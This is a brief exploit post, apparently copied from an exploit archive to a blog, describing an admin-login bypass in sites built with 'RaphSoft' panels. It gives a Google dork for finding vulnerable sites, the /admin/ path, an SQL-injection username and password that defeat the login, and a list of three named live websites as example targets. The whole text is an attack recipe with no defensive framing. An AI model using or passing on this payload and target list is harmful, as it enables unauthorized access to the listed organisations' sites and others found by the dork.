RaphSoft bypass admin

RaphSoft bypass admin



# Exploit Title : RaphSoft Control Panel Bypass Admin Page Vulnerability
# Date : 2018-10-05
# Exploit Author : Iran Cyber Security Group
# Google Dork : "intext:Designed by RaphSoft"
# category : webapps
# Tested on : Win7 , Kali Linux



Proof of Concept :

search google Dork : "intext:Designed by RaphSoft" Demo : Then Choose a Target and put this after URL : /admin/
And fill username and password like the information below :

Username : '=' 'or'
Password : '=' 'or'


http://www.johnsonmarkconstructs.com/admin/ http://www.tombeyschool.com/admin/ http://www.royalstridesecuritysystems.com/admin/

# Discovered by : Mr_null

Komentar